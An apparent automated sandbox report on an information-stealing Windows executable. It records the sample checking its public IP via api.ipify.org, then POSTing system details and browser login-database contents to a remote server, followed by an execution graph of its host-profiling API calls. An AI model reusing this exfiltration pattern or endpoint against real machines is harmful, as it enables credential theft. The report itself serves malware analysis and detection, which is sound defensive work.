          Dec 6, 2024 11:10:34.663304090 CET4971480192.168.2.6172.67.74.152
          TimestampSource PortDest PortSource IPDest IP
          Dec 6, 2024 11:10:29.603085995 CET5624453192.168.2.61.1.1.1
          Dec 6, 2024 11:10:29.741280079 CET53562441.1.1.1192.168.2.6
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Dec 6, 2024 11:10:29.603085995 CET192.168.2.61.1.1.10x72c3Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 6, 2024 11:10:26.403680086 CET1.1.1.1192.168.2.60x7ad8No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          Dec 6, 2024 11:10:26.403680086 CET1.1.1.1192.168.2.60x7ad8No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
          Dec 6, 2024 11:10:29.741280079 CET1.1.1.1192.168.2.60x72c3No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
          Dec 6, 2024 11:10:29.741280079 CET1.1.1.1192.168.2.60x72c3No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
          Dec 6, 2024 11:10:29.741280079 CET1.1.1.1192.168.2.60x72c3No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
          • api.ipify.org
          • 185.237.165.97
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.649714172.67.74.152804600C:\Users\user\Desktop\Simple2.exe
          TimestampBytes transferredDirectionData
          Dec 6, 2024 11:10:29.898848057 CET88OUTGET / HTTP/1.1
          Connection: Keep-Alive
          User-Agent: WinHTTP/1.0
          Host: api.ipify.org
          Dec 6, 2024 11:10:30.962733984 CET429INHTTP/1.1 200 OK
          Date: Fri, 06 Dec 2024 10:10:30 GMT
          Content-Type: text/plain
          Content-Length: 12
          Connection: keep-alive
          Vary: Origin
          CF-Cache-Status: DYNAMIC
          Server: cloudflare
          CF-RAY: 8edb7c8e6e75438d-EWR
          server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
          Data Ascii: 8.46.123.228


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.649715185.237.165.97804600C:\Users\user\Desktop\Simple2.exe
          TimestampBytes transferredDirectionData
          Dec 6, 2024 11:10:32.064127922 CET185OUTPOST /userdata HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=WebKitFormBoundary
          User-Agent: WinHTTP/1.0
          Content-Length: 96979
          Host: 185.237.165.97
          Dec 6, 2024 11:10:32.064218044 CET11124OUTData Raw: 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 79 73 69 6e 66 6f 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
          Data Ascii: --WebKitFormBoundaryContent-Disposition: form-data; name="sysinfo"Content-Type: application/json{ "sysinfo": "MACHINE%20INFO%3a%0aMachine%20name%3a%20440BX%20Desktop%20Reference%20Platform%0aProcessor%20name%3a%20Intel%28R%29%20Core%28
          Dec 6, 2024 11:10:32.183846951 CET1236OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:10:32.183939934 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:10:32.184120893 CET4944OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:10:32.184145927 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:10:32.184187889 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:10:32.184267998 CET4944OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:10:32.184292078 CET2472OUTData Raw: 4f 49 4e 43 52 45 4d 45 4e 54 2c 20 70 61 72 65 6e 74 5f 69 64 20 49 4e 54 45 47 45 52 20 4e 4f 54 20 4e 55 4c 4c 20 52 45 46 45 52 45 4e 43 45 53 20 6c 6f 67 69 6e 73 20 4f 4e 20 55 50 44 41 54 45 20 43 41 53 43 41 44 45 20 4f 4e 20 44 45 4c 45
          Data Ascii: OINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));O)
          Dec 6, 2024 11:10:32.184351921 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:10:32.303705931 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:05:10:27
          Start date:06/12/2024
          Path:C:\Users\user\Desktop\Simple2.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\Simple2.exe"
          Imagebase:0x7ff6876b0000
          File size:79'872 bytes
          MD5 hash:ED207427A25863F5524D616525943DD5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:05:10:28
          Start date:06/12/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:30.3%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:41.2%
            Total number of Nodes:743
            Total number of Limit Nodes:12
            execution_graph 3733 7ff6876b6eb0 3735 7ff6876b6ed6 3733->3735 3737 7ff6876b6edd 3733->3737 3734 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3736 7ff6876b7056 3734->3736 3735->3734 3737->3735 3738 7ff6876b6f85 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3737->3738 3739 7ff6876b6f63 fputc 3737->3739 3740 7ff6876b6ff4 3738->3740 3741 7ff6876b6fca 3738->3741 3739->3735 3740->3735 3743 7ff6876b7003 fwrite 3740->3743 3741->3740 3742 7ff6876b6fcf 3741->3742 3742->3735 3744 7ff6876b6fd4 fputc 3742->3744 3743->3735 3744->3735 3906 7ff6876b1730 3907 7ff6876b7790 _Receive_impl 3 API calls 3906->3907 3908 7ff6876b1772 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3907->3908 3275 7ff6876b96b0 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3745 7ff6876b83b0 ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA 3746 7ff6876b83e1 3745->3746 3747 7ff6876b83d4 3745->3747 3748 7ff6876bb180 _Receive_impl free 3747->3748 3748->3746 3912 7ff6876b8430 ?uncaught_exception@std@ 3913 7ff6876b8443 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3912->3913 3914 7ff6876b844d 3912->3914 3913->3914 3915 7ff6876b8230 3921 7ff6876b70b0 3915->3921 3924 7ff6876b70cd 3921->3924 3922 7ff6876b7175 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3923 7ff6876b714c ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3923->3922 3924->3922 3924->3923 3925 7ff6876b8470 10 API calls 3924->3925 3926 7ff6876b713f fclose 3925->3926 3926->3923 3927 7ff6876bc430 3928 7ff6876bc450 3927->3928 3929 7ff6876bc443 3927->3929 3930 7ff6876b7fd0 Concurrency::details::SchedulerBase::GetBitSet 2 API calls 3929->3930 3930->3928 3749 7ff6876bc9ac 3751 7ff6876bc9b4 3749->3751 3750 7ff6876bca01 3751->3750 3752 7ff6876bb180 _Receive_impl free 3751->3752 3752->3751 3260 7ff6876b6920 3261 7ff6876b6942 3260->3261 3262 7ff6876b6937 3260->3262 3263 7ff6876b6949 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J 3261->3263 3264 7ff6876b6958 3261->3264 3263->3264 3265 7ff6876b697d memcpy 3264->3265 3268 7ff6876b69b2 3264->3268 3265->3268 3266 7ff6876b6a4e 3267 7ff6876b6a2e 3267->3266 3270 7ff6876b6a33 fread 3267->3270 3268->3266 3268->3267 3269 7ff6876b6a00 fread 3268->3269 3269->3266 3269->3268 3270->3266 3931 7ff6876b1220 __std_exception_destroy 3936 7ff6876bc818 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N 3937 7ff6876bb71a 3938 7ff6876bbc5c GetModuleHandleW 3937->3938 3939 7ff6876bb721 3938->3939 3940 7ff6876bb760 _exit 3939->3940 3941 7ff6876bb725 3939->3941 3189 7ff6876b7590 3191 7ff6876b75b8 3189->3191 3201 7ff6876b75bd 3189->3201 3190 7ff6876b7640 3192 7ff6876bb188 std::_Facet_Register 3 API calls 3190->3192 3200 7ff6876b7645 3190->3200 3191->3190 3193 7ff6876b7631 3191->3193 3194 7ff6876b763e 3191->3194 3191->3201 3192->3200 3193->3194 3196 7ff6876b7783 3193->3196 3194->3201 3206 7ff6876bb188 3194->3206 3195 7ff6876b7692 memcpy 3204 7ff6876b76cb 3195->3204 3218 7ff6876b1270 3196->3218 3199 7ff6876b7788 3200->3195 3202 7ff6876b775e _invalid_parameter_noinfo_noreturn 3200->3202 3202->3201 3203 7ff6876b7730 3215 7ff6876bb180 3203->3215 3204->3201 3204->3202 3204->3203 3207 7ff6876bb1a2 malloc 3206->3207 3208 7ff6876bb193 3207->3208 3209 7ff6876bb1ac 3207->3209 3208->3207 3210 7ff6876bb1b2 3208->3210 3209->3200 3211 7ff6876bb1bd 3210->3211 3221 7ff6876bb924 3210->3221 3213 7ff6876b1270 Concurrency::cancel_current_task __std_exception_copy 3211->3213 3214 7ff6876bb1c3 3213->3214 3216 7ff6876bb8fc free 3215->3216 3219 7ff6876b127e Concurrency::cancel_current_task 3218->3219 3220 7ff6876b128f __std_exception_copy 3219->3220 3220->3199 3224 7ff6876bb904 3221->3224 3223 7ff6876bb932 _CxxThrowException 3224->3223 3753 7ff6876b7090 3754 7ff6876b70a3 3753->3754 3755 7ff6876b709c _lock_file 3753->3755 3755->3754 3756 7ff6876b7190 3757 7ff6876b71a1 3756->3757 3758 7ff6876b71ce 3756->3758 3759 7ff6876b71c6 3757->3759 3761 7ff6876b71e1 _invalid_parameter_noinfo_noreturn 3757->3761 3760 7ff6876bb180 _Receive_impl free 3759->3760 3760->3758 3762 7ff6876b71fe 3761->3762 3942 7ff6876b6510 3943 7ff6876b6550 3942->3943 3944 7ff6876b6523 3942->3944 3944->3943 3945 7ff6876b6533 fflush 3944->3945 3763 7ff6876bc190 3764 7ff6876bc1a3 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3763->3764 3765 7ff6876bc1b8 3763->3765 3764->3765 3766 7ff6876bc790 3767 7ff6876bc7b0 3766->3767 3768 7ff6876bc7a3 3766->3768 3770 7ff6876b7fd0 3768->3770 3771 7ff6876b800f 3770->3771 3772 7ff6876b7fe3 3770->3772 3771->3767 3773 7ff6876b8007 3772->3773 3774 7ff6876b8028 _invalid_parameter_noinfo_noreturn 3772->3774 3775 7ff6876bb180 _Receive_impl free 3773->3775 3775->3771 3946 7ff6876b8310 3947 7ff6876b7790 _Receive_impl 3 API calls 3946->3947 3948 7ff6876b8361 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3947->3948 3949 7ff6876b838b 3948->3949 3950 7ff6876b837a 3948->3950 3951 7ff6876bb180 _Receive_impl free 3950->3951 3951->3949 3952 7ff6876bc70e ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 3953 7ff6876bb508 3954 7ff6876bb518 3953->3954 3966 7ff6876bb30c 3954->3966 3956 7ff6876bb59f 3957 7ff6876bbb0c 9 API calls 3956->3957 3965 7ff6876bb5ad 3956->3965 3958 7ff6876bb5bd 3957->3958 3959 7ff6876bb53c _RTC_Initialize 3959->3956 3974 7ff6876bbdd0 InitializeSListHead 3959->3974 3967 7ff6876bb31d 3966->3967 3971 7ff6876bb34f 3966->3971 3968 7ff6876bb38c 3967->3968 3972 7ff6876bb322 __scrt_acquire_startup_lock 3967->3972 3969 7ff6876bbb0c 9 API calls 3968->3969 3970 7ff6876bb396 3969->3970 3971->3959 3972->3971 3973 7ff6876bb33f _initialize_onexit_table 3972->3973 3973->3971 3975 7ff6876bc906 3976 7ff6876bc92f 3975->3976 3977 7ff6876bc93b __current_exception __current_exception_context terminate 3975->3977 3977->3976 3271 7ff6876b1000 ?_Init@locale@std@@CAPEAV_Locimp@12@_N 3272 7ff6876bb188 std::_Facet_Register 3 API calls 3271->3272 3273 7ff6876b1079 ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@ ??Bid@locale@std@ ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD 3272->3273 3274 7ff6876b10f0 3273->3274 3776 7ff6876b7880 3777 7ff6876b78bb 3776->3777 3778 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3777->3778 3779 7ff6876b79da 3778->3779 3781 7ff6876bc97d _seh_filter_exe 3782 7ff6876b7070 3783 7ff6876b7083 3782->3783 3784 7ff6876b707c _unlock_file 3782->3784 3784->3783 3785 7ff6876b6a70 3786 7ff6876b6aa7 3785->3786 3788 7ff6876b6b3e fgetc 3786->3788 3789 7ff6876b6b22 fgetc 3786->3789 3791 7ff6876b6ab7 3786->3791 3787 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3790 7ff6876b6d2b 3787->3790 3795 7ff6876b6c74 3788->3795 3796 7ff6876b6b6b 3788->3796 3789->3791 3791->3787 3792 7ff6876b6baa ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3792->3796 3794 7ff6876b6d18 3797 7ff6876bb180 _Receive_impl free 3794->3797 3795->3791 3795->3794 3798 7ff6876b6caf _invalid_parameter_noinfo_noreturn 3795->3798 3796->3792 3796->3795 3799 7ff6876b6c1b memcpy fgetc 3796->3799 3801 7ff6876b6cce 3796->3801 3802 7ff6876ba0a0 3796->3802 3797->3791 3798->3795 3799->3795 3799->3796 3800 7ff6876b6cf0 ungetc 3800->3795 3800->3801 3801->3795 3801->3800 3803 7ff6876ba0cf 3802->3803 3804 7ff6876ba1f4 3802->3804 3806 7ff6876ba12a 3803->3806 3809 7ff6876ba152 3803->3809 3810 7ff6876ba11d 3803->3810 3822 7ff6876b1310 ?_Xlength_error@std@@YAXPEBD 3804->3822 3808 7ff6876bb188 std::_Facet_Register 3 API calls 3806->3808 3807 7ff6876ba1f9 3812 7ff6876b1270 Concurrency::cancel_current_task __std_exception_copy 3807->3812 3811 7ff6876ba13f 3808->3811 3809->3811 3814 7ff6876bb188 std::_Facet_Register 3 API calls 3809->3814 3810->3806 3810->3807 3813 7ff6876ba1bd _invalid_parameter_noinfo_noreturn 3811->3813 3816 7ff6876ba1c4 memcpy 3811->3816 3817 7ff6876ba17a memcpy 3811->3817 3815 7ff6876ba1ff 3812->3815 3813->3816 3814->3811 3821 7ff6876ba1bb 3816->3821 3818 7ff6876ba1b0 3817->3818 3819 7ff6876ba19b 3817->3819 3820 7ff6876bb180 _Receive_impl free 3818->3820 3819->3813 3819->3818 3820->3821 3821->3792 3823 7ff6876b1170 __std_exception_copy 3824 7ff6876bc170 3825 7ff6876bb180 _Receive_impl free 3824->3825 3826 7ff6876bc187 3825->3826 3980 7ff6876b83f0 3985 7ff6876b7c90 3980->3985 3982 7ff6876b8404 3983 7ff6876b8416 3982->3983 3984 7ff6876bb180 _Receive_impl free 3982->3984 3984->3983 3986 7ff6876b7ce7 3985->3986 3988 7ff6876b7cb1 3985->3988 3987 7ff6876b7d30 3986->3987 3989 7ff6876b7d6d _invalid_parameter_noinfo_noreturn 3986->3989 3991 7ff6876b7d28 3986->3991 3987->3982 3988->3989 3990 7ff6876bb180 _Receive_impl free 3988->3990 3993 7ff6876b7dc4 3989->3993 3994 7ff6876b7d93 3989->3994 3990->3986 3992 7ff6876bb180 _Receive_impl free 3991->3992 3992->3987 3993->3982 3995 7ff6876b7dbc 3994->3995 3996 7ff6876b7ddb _invalid_parameter_noinfo_noreturn 3994->3996 3997 7ff6876bb180 _Receive_impl free 3995->3997 3997->3993 3998 7ff6876b81f0 3999 7ff6876b70b0 13 API calls 3998->3999 4000 7ff6876b8204 3999->4000 4001 7ff6876b8216 4000->4001 4002 7ff6876bb180 _Receive_impl free 4000->4002 4002->4001 4003 7ff6876bbff4 4004 7ff6876bc02c __GSHandlerCheckCommon 4003->4004 4005 7ff6876bc058 4004->4005 4006 7ff6876bc047 __CxxFrameHandler4 4004->4006 4006->4005 3827 7ff6876bb768 3830 7ff6876bbd1c 3827->3830 3831 7ff6876bbd3f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 3830->3831 3832 7ff6876bb771 3830->3832 3831->3832 3277 7ff6876bb5ec 3278 7ff6876bb605 3277->3278 3279 7ff6876bb743 3278->3279 3280 7ff6876bb60d __scrt_acquire_startup_lock 3278->3280 3527 7ff6876bbb0c IsProcessorFeaturePresent 3279->3527 3282 7ff6876bb74d 3280->3282 3287 7ff6876bb62b __scrt_release_startup_lock 3280->3287 3283 7ff6876bbb0c 9 API calls 3282->3283 3284 7ff6876bb758 3283->3284 3286 7ff6876bb760 _exit 3284->3286 3285 7ff6876bb650 3287->3285 3288 7ff6876bb6d6 _get_initial_narrow_environment __p___argv __p___argc 3287->3288 3291 7ff6876bb6ce _register_thread_local_exe_atexit_callback 3287->3291 3297 7ff6876b5540 GetConsoleWindow ShowWindow 3288->3297 3291->3288 3294 7ff6876bb703 3295 7ff6876bb708 _cexit 3294->3295 3296 7ff6876bb70d 3294->3296 3295->3296 3296->3285 3533 7ff6876b9260 3297->3533 3299 7ff6876b55bc 3539 7ff6876b41f0 3299->3539 3303 7ff6876b55d3 3304 7ff6876b5614 3303->3304 3305 7ff6876b560f 3303->3305 3307 7ff6876b5608 _invalid_parameter_noinfo_noreturn 3303->3307 3306 7ff6876b9260 11 API calls 3304->3306 3308 7ff6876bb180 _Receive_impl free 3305->3308 3309 7ff6876b562a 3306->3309 3307->3305 3308->3304 3591 7ff6876b3e70 GetLocaleInfoA 3309->3591 3312 7ff6876b7f40 11 API calls 3313 7ff6876b5641 3312->3313 3314 7ff6876b5682 3313->3314 3315 7ff6876b567d 3313->3315 3317 7ff6876b5676 _invalid_parameter_noinfo_noreturn 3313->3317 3316 7ff6876b9260 11 API calls 3314->3316 3318 7ff6876bb180 _Receive_impl free 3315->3318 3319 7ff6876b5698 GetSystemInfo memset 3316->3319 3317->3315 3318->3314 3627 7ff6876b6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3319->3627 3321 7ff6876b56c3 3628 7ff6876b94e0 3321->3628 3324 7ff6876b94e0 9 API calls 3325 7ff6876b56f4 3324->3325 3326 7ff6876b94e0 9 API calls 3325->3326 3327 7ff6876b5707 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K 3326->3327 3328 7ff6876b94e0 9 API calls 3327->3328 3329 7ff6876b5723 3328->3329 3642 7ff6876b8760 3329->3642 3331 7ff6876b5734 3648 7ff6876b7790 3331->3648 3333 7ff6876b5773 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3334 7ff6876b7f40 11 API calls 3333->3334 3335 7ff6876b579c 3334->3335 3336 7ff6876b57dd 3335->3336 3337 7ff6876b57d8 3335->3337 3340 7ff6876b57d1 _invalid_parameter_noinfo_noreturn 3335->3340 3338 7ff6876b9260 11 API calls 3336->3338 3341 7ff6876bb180 _Receive_impl free 3337->3341 3339 7ff6876b57f3 GlobalMemoryStatusEx memset 3338->3339 3342 7ff6876b6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3339->3342 3340->3337 3341->3336 3343 7ff6876b5826 3342->3343 3344 7ff6876b94e0 9 API calls 3343->3344 3345 7ff6876b5843 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K 3344->3345 3346 7ff6876b94e0 9 API calls 3345->3346 3347 7ff6876b585e 3346->3347 3348 7ff6876b8760 8 API calls 3347->3348 3349 7ff6876b586f 3348->3349 3350 7ff6876b7790 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3349->3350 3351 7ff6876b58a7 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3350->3351 3352 7ff6876b7f40 11 API calls 3351->3352 3353 7ff6876b58d0 3352->3353 3354 7ff6876b5911 3353->3354 3356 7ff6876b590c 3353->3356 3359 7ff6876b5905 _invalid_parameter_noinfo_noreturn 3353->3359 3355 7ff6876b9260 11 API calls 3354->3355 3358 7ff6876b5927 3355->3358 3357 7ff6876bb180 _Receive_impl free 3356->3357 3357->3354 3360 7ff6876b37a0 53 API calls 3358->3360 3359->3356 3361 7ff6876b5931 3360->3361 3362 7ff6876b7f40 11 API calls 3361->3362 3363 7ff6876b593e 3362->3363 3364 7ff6876b597f 3363->3364 3365 7ff6876b597a 3363->3365 3368 7ff6876b5973 _invalid_parameter_noinfo_noreturn 3363->3368 3366 7ff6876b9260 11 API calls 3364->3366 3369 7ff6876bb180 _Receive_impl free 3365->3369 3367 7ff6876b5995 malloc memset 3366->3367 3370 7ff6876b6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3367->3370 3368->3365 3369->3364 3371 7ff6876b59ca GetAdaptersInfo 3370->3371 3372 7ff6876b59e9 GetAdaptersInfo 3371->3372 3373 7ff6876b59dd malloc 3371->3373 3374 7ff6876b5a6c 3372->3374 3390 7ff6876b59fa 3372->3390 3373->3372 3375 7ff6876b5a73 free 3374->3375 3376 7ff6876b5a7c 3374->3376 3375->3376 3377 7ff6876b8760 8 API calls 3376->3377 3379 7ff6876b5a8d 3377->3379 3378 7ff6876b94e0 9 API calls 3378->3390 3380 7ff6876b7790 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3379->3380 3381 7ff6876b5ac5 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3380->3381 3382 7ff6876b7f40 11 API calls 3381->3382 3383 7ff6876b5aee 3382->3383 3384 7ff6876b5b2f 3383->3384 3386 7ff6876b5b2a 3383->3386 3389 7ff6876b5b23 _invalid_parameter_noinfo_noreturn 3383->3389 3385 7ff6876b4570 28 API calls 3384->3385 3388 7ff6876b5b38 3385->3388 3387 7ff6876bb180 _Receive_impl free 3386->3387 3387->3384 3391 7ff6876b637f 3388->3391 3392 7ff6876b5b57 3388->3392 3389->3386 3390->3374 3390->3376 3390->3378 3393 7ff6876b1310 ?_Xlength_error@std@@YAXPEBD 3391->3393 3394 7ff6876b5c04 memcpy 3392->3394 3397 7ff6876b5b95 3392->3397 3399 7ff6876b5bde 3392->3399 3400 7ff6876b5bed 3392->3400 3395 7ff6876b6384 3393->3395 3396 7ff6876b9260 11 API calls 3394->3396 3401 7ff6876b1270 Concurrency::cancel_current_task __std_exception_copy 3395->3401 3398 7ff6876b5c57 3396->3398 3403 7ff6876bb188 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3397->3403 3402 7ff6876b7f40 11 API calls 3398->3402 3399->3395 3399->3397 3404 7ff6876bb188 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3400->3404 3407 7ff6876b5bae 3400->3407 3405 7ff6876b638a 3401->3405 3406 7ff6876b5c85 3402->3406 3403->3407 3404->3407 3408 7ff6876b5cc6 3406->3408 3412 7ff6876b5cc1 3406->3412 3415 7ff6876b5cba _invalid_parameter_noinfo_noreturn 3406->3415 3407->3394 3409 7ff6876b5cfb _invalid_parameter_noinfo_noreturn 3407->3409 3408->3409 3410 7ff6876b5d07 3408->3410 3411 7ff6876b5d02 3408->3411 3409->3411 3414 7ff6876b9260 11 API calls 3410->3414 3413 7ff6876bb180 _Receive_impl free 3411->3413 3416 7ff6876bb180 _Receive_impl free 3412->3416 3413->3410 3417 7ff6876b5d1d 3414->3417 3415->3412 3416->3408 3418 7ff6876b3a40 70 API calls 3417->3418 3419 7ff6876b5d27 3418->3419 3420 7ff6876b7f40 11 API calls 3419->3420 3421 7ff6876b5d34 3420->3421 3422 7ff6876b5d75 3421->3422 3424 7ff6876b5d70 3421->3424 3427 7ff6876b5d69 _invalid_parameter_noinfo_noreturn 3421->3427 3423 7ff6876b9260 11 API calls 3422->3423 3426 7ff6876b5d8b memset 3423->3426 3425 7ff6876bb180 _Receive_impl free 3424->3425 3425->3422 3428 7ff6876b6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3426->3428 3427->3424 3429 7ff6876b5db0 NetGetJoinInformation 3428->3429 3430 7ff6876b5dca 3429->3430 3451 7ff6876b5e77 3429->3451 3432 7ff6876b8830 40 API calls 3430->3432 